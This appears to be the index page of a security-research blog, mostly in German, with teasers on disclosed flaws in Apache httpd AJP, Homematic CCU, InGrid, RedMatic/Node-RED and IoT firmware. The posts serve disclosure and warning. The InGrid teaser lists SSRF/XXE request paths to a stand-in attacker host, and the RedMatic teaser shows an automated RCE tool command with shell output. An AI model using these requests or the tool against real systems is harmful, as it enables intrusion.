CVE-2022-26377 Apache httpd AJP request smuggling - a proof of concept payload generator

While searching for a HTTP request smuggling possibility in my security exploration of Entersekt Transakt secure gateway which is HAproxy 1.5 based, I saw the CVE-2022-26377 Apache httpd mod_proxy_ajp request smuggling.
Hmm, I have such project setup for another component…
Searching for the reporter I found his blog. Thanks to DeepL or Google translate, the chinese page is readable for the rest of the world.
I created a payload generator based on allyshka ‘s script for CVE-2020-1938 Ghostcat - Apache Tomcat AJP vulnerability and BINGO it’s working.
In our special case I could create a Denial of Service on-top.

Read More

Log injection or log forging with control characters and ESC- & CSI-sequences

Since long time I already get some nice log file entries in various projects by using newline, backspace, other control characters AND ESC- & CSI-sequences to inject the log file.
Only to confuse the admin or the log aggregation system as SPLUNK, Grafana Loki, etc.
Sometimes there could be a monitoring alert notification setup where someone needs to react as on-call duty.
Nobody wants to do this at night!!!

Read More

tado° Internet Bridge - Eine Schwachstellen-Analyse der Kommunikation auf mögliche Sicherheitslücken

Ich habe mir ein tado° Starter Kit - Smartes Heizkörper-Thermostat V3+ zugelegt.
Bevor es mit der Ersteinrichtung losging, wollte ich wissen, was die Internet Bridge so alles macht.
Damit das System nicht durch jeden x-beliebigen Hacker angegriffen werden kann, mit der Konsequenz das dieser sieht wo das System verbaut ist und am Verbrauch Rückschlüsse auf eine mögliche Abwesenheit ziehen kann, habe ich es mir aus Sicht eines Angreifers angesehen.

Read More

(kein) echtes Sicherheitsbewusstsein von eQ-3 zu Homematic CCU Sicherheitslücken?

Ob eQ-3 als Hersteller der Homematic CCU das Thema Sicherheit wirklich ernst nimmt oder nur pressewirksam in einer Eigendarstellung darüber berichtet, wie zuletzt am 18.03.2019 die eQ-3 Pressemitteilung aka CVE-2019-10119 CVE-2019-10120 CVE-2019-10121 CVE-2019-10122, ich weiß es nicht ich glaube es durch meine bisherigen Erfahrungen nicht mehr.
Ich als Melder von potentiellen Sicherheitslücken fühle mich jedenfalls zum Ende hin nicht ernst genommen.
Auch die bisher schon bekannten 6 CVEs aus dem Jahr 2018, davon 3 schwere Sicherheitslücken, siehe Übersicht auf www.cvedetails.com, sind teilweise heute noch nicht behoben worden oder erst “frisch” nach einem Jahr.
Leider teils nur oberflächlich geflickt….

Read More

Mehrere Schwachstellen (SSRF, XXE, XML Bombe, Admin API Zugriff, etc.) im InGrid Framework (ingrid-webmap-client) geschlossen

Verschiedene Bundesländer- und Bundesportale für (Geo-)Metadaten enthielten einige Schwachstellen im InGrid Framework, die nun gefixt wurden:

  • Drei Möglichkeiten einer XXE via SSRF
    /ingrid-webmap-client/rest/wms/proxy/?url=https://SSRF_IP/xxe.xml
    /ingrid-webmap-client/rest/wms/proxy/layers?url=http://SSRF_IP/xxe_layers.xml
    /ingrid-webmap-client/rest/search/query?type=services&q=dummy&searchUrl=https://SSRF_IP/xxe_rss_channel_item.xml
    
  • XML Bombe via SSRF
  • SSRF auf interne Systeme. Zumindest meine Testdatei wird nun nicht mehr ausgegeben, da sie eventuell nicht der erwarteten Struktur entspricht.
  • Schreibender Admin Zugriff auf Daten, die unter anderem eine persistente XSS ermöglichen können
  • Tomcat Version Disclosure Schwachstelle & Veralteter Tomcat Softwarestand
Read More

Angriffsvektoren auf aktuelle embedded Linux Busybox/Buildroot Systeme (IoT/Router/Smart Home) wegen Sicherheitslücken in veralteter Softwarebasis

Der initiale Post wurde am 27.06.19 verfasst.
Veraltete Busybox oder Buildroot Versionen können zu einem Problem werden, da diese Sicherheitslücken enthalten.

Heutzutage ist Software Pflege das A und O um nicht verwundbar zu sein.
Die Hersteller sind in guter Gesellschaft, es ist keiner Besser als der andere. Viele setzen teilweise veraltete oder sehr veraltete Versionen als Basis ein!

Wichtig zu wissen: Das Datum in der Versionsausgabe von Busybox ist das Datum der Kompilierung und nicht das Release Datum!
Es gibt alleine 17 CVEs zur Busybox als eigenständiges Produkt:
Busybox on cvedetails.com
Und es gab weitere Sicherheitsupdates, die nicht explizit als CVE bekannt geworden sind.
Zumindest die bekannten Lücken im DHCP und NTP wären dann eine Angriffsmöglichkeit.


Und die Buildroot in einigen Systemen ist wahrscheinlich noch viel mehr betroffen
Buildroot changes
Alle CVEs aufgelistet in den Commits, mit 50 Einträge pro Seite
Search CVEs in Buildroot commits - page 1
bis
Search CVEs in Buildroot commits - page 900
ergeben Stand heute 2019-06-27 932 Updates wegen Zuordnungen zu CVEs !!!



Bisher habe ich drei Anfragen mit dieser Fragestellung rausgeschickt

Ist ihnen die veraltete Busybox/Buildroot „Problematik“ bewusst und gibt es allgemeine Bestrebungen Firmware Releases auf neuerer Basis rauszubringen?
Zumindest die bekannten Lücken im DHCP und NTP wären dann eine Angriffsmöglichkeit.
Read More

Smart Home: Testinstitute/Testergebnisse – Die Testdurchführungs-Fakten, die Wahrnehmung und am Ende die Annahmen die ein Verbraucher treffen könnte

Jeder hat schon einmal ein Testergebnis zu einem Produkt gesucht und sich auf dieses unabhängige Ergebnis verlassen. Bei „analogen“ Produkten ist das auch irgendwie nachvollziehbar. Aber IoT / Smart Home Produkte kommunizieren teilweise in einem lokalen Netzwerk oder sind sogar über das Internet steuerbar.
Jedenfalls die Außenwirkung der Testergebnisse könnte dann zu Annahmen verleiten, die so gar nicht zutreffen.
Was genau wurde denn in welchem Umfang getestet und welches Produkt konkret des Herstellers?
Diese Fragen sollten einfach verständlich auch für Otto Normalverbraucher nachvollziehbar beantwortbar sein können.
Manche Einstiegsprodukte (Startersets) sind der Anfang einer komplexen Installation und man holt sich die eventuellen Probleme ins Haus.

Die Fragestellung an die Testinstitute Stiftung Warentest, dem VDE und AV-Test war immer mehr oder weniger dieselbe.
Hier der Hauptteil der Anfrage:

Falls sie an der Außenwirkung der von Ihnen vergebenen Zertifikate/Testergebnisse interessiert sind, hier mein persönliches Feedback und warum diese Nachfrage entstanden ist. Gleich vorweg, damit es zu keinem Missverständnis kommt. Es geht nicht um ihre Tests, sondern wie diese Verkaufsfördernd von den Herstellern eingesetzt werden könnten.

Wirbt ein Hersteller mit einem von Ihnen als (sehr) sicher eingestuftes Produkt, ist das eine ähnliche Wirkung wie ein Testergebnis bei Stiftung Warentest. Denn stellt er ein (sehr) sicheres Produkt her, so werden die anderen mind. auch den höchsten Ansprüchen entsprechen. Kaum ein Verbraucher wird sich im Detail darüber informieren, ob die andere Produktlösung vom selben Hersteller nicht eventuell unsicher ist. Der Hersteller wird damit jedenfalls nicht werben unsichere Produkte zu vertreiben.

Vielleicht grenzen Sie die Vergabe der Zertifikate eventuell deutlicher ab, damit beim Endverbraucher kein falscher Eindruck entsteht. Nur weil Produkt X (sehr) sicher ist, muss das für Produkt Y noch lange nicht gelten.

Read More

RedMatic als Homematic AddOn kann für Remote Code Execution missbraucht werden

RedMatic baut auf Node-RED auf und ist eine Erweiterung für Homematic CCUs.
Wenn der Node-RED Zugang ungeschützt ist, weil die Authentifizierung abgeschaltet wurde, kann ein Angreifer dadurch sofort eine Remote Code Execution auf dem System durchführen, ganz einfach über Port 80.
Node-RED liefert ja extra dokumentierte Möglichkeiten lokal Befehle ausführen zu können um Steuerungssequenzen umzusetzen. Wenn nun der Zugang mit den Login Mitteln der CCU gesichert ist, kennen wir zumindest den Usernamen “Admin” und nur das Passwort muss per Bruteforce gefunden werden. Ein starkes/sicheres Passwort ist wie immer also sehr wichtig.
Ist der Zugang Individuell gesichert mit einer eigenen Username/Passwort Kombination, wird es schon schwieriger sein, die Zugangsdaten zu erhalten. Das starke/sichere Passwort ist hier natürlich auch zwingend notwendig um sich so gut wie möglich zu schützen.

Wie in dem Artikel von Quentin Kaiser Gaining RCE by abusing Node-RED aufgezeigt, ist eine RCE dann für RedMatic Systeme auch ausnutzbar, da es ja auf Node-Red aufsetzt.
Ein Websocket dient dabei als Shell Zugang. Echt verrückt, was technisch alles möglich ist, zumal dieses Python Skript den Angriff vollkommen automatisiert:

./noderedsh.py --username Admin --password mySecret http://1.2.3.4/addons/red
.....
[+] Establishing RCE link ....
> ls -l
total 4840
-rw-r--r--    1 root   root 43 Sep  5 14:57 VERSION
........

Also bitte niemals die Authentifizierung abschalten oder einfache Passwörter nutzen.

Es gibt so viele technisch unerfahrene Benutzer, die sich nicht vorstellen können, das und wie einfach potentielle Sicherheitslücken oder wie hier falsche Konfigurationen ausgenutzt werden können. Wenn dieser Artikel auch nur einen Anwender sensibilisiert, ist das Ziel erreicht.

Der Blogeintrag wurde am 06.10.19 etwas umgeschrieben, da im Homematic Forum der Stil diese Artikels angekreidet wurde.
Die HM Forum Gemeinde ist da etwas eigensinnig. Es ist immer das eventuelle Portforwarding oder der Nutzer das Problem, aber nie die unsichere CCU, die es dem Angreifer wirklich sehr einfach macht.
Wenn schon das Smart Home kein primäres Ziel des Hackers ist, schon mal von Mirai oder Echobot gehört?
Ich möchte hier nur die sensibilisieren, die sich unwissentlich angreifbar machen und bei Smart Home nicht nach dem Motto no Risk no Fun leben wollen.
Das dies auch in echt passiert, zeigt dieser Thread ich wurde “gehackt”. Aber hier war RedMatic bestimmt nicht im Spiel, da reichte schon eine der vielen Sicherheitslücken im ReGa Prozess.

Read More

IoT Malware 'Mirai' Abkömmling Echobot befällt auch Homematic CCU Zentralen

Im Mai hatte das BSI über Twitter vermeldet, das sehr viele Homematic Systeme aus dem Internet erreichbar sind.
Das hatte scheinbar niemanden interessiert und wurde somit nicht weiter verbreitet.
Ende August gab es eine erneute Meldung welche von Heise aufgegriffen wurde, womit das Thema etwas mehr Aufmerksamkeit bekommen hat.

Das Thema ungeschütztes Portforwarding jetzt mal völlig außen vorgelassen, es wird oft und gerne darüber diskutiert, was es bei einer Smart Home Installation schon zu holen gäbe.
Auch fragen sich einige Nutzer im Homatic Forum warum die Sicherheit jetzt so übertrieben in den Fokus gerückt wird.
Bisschen Lampen an/aus, Heizungsthermostate regeln, gut ist. Eine Keymatic wäre schon interessanter und der Worst Case wenn in der CCU noch die Geo-Location Daten brav vom Besitzer auf den Meter genau eingetragen wurden, dann ist ja alles klar wo die Tür aufgeht….

ABER der aus 2016 bekannte Mirai Schädlich, der IoT Geräte im großen Stil für ein Botnetz missbraucht hat, besitzt einen Abkömmling Namens Echobot. Dieser versucht mit einer alten Sicherheitslücke der Homematic CCU auf das System zu kommen.
Wenn schon keiner daran interessiert ist, digital ins Haus einzubrechen, so ist ein Botnetz für Spam Versand und DDoS Attacken sehr wohl interessant für den gemeinen Botnetz Betreiber.

Read More

How this blog started, because I own a Homematic "Smart Home" control unit.

Testing is my passion. Sharing knowledge is my contribution.
Every family has a skeleton in the cupboard.
And I like to burn down software from testers point of view. Developers ….they “(dis)like me” :-)
For CVE submission and publication an external reference with CVE detail description is required.
Finally my blog was born.

Read More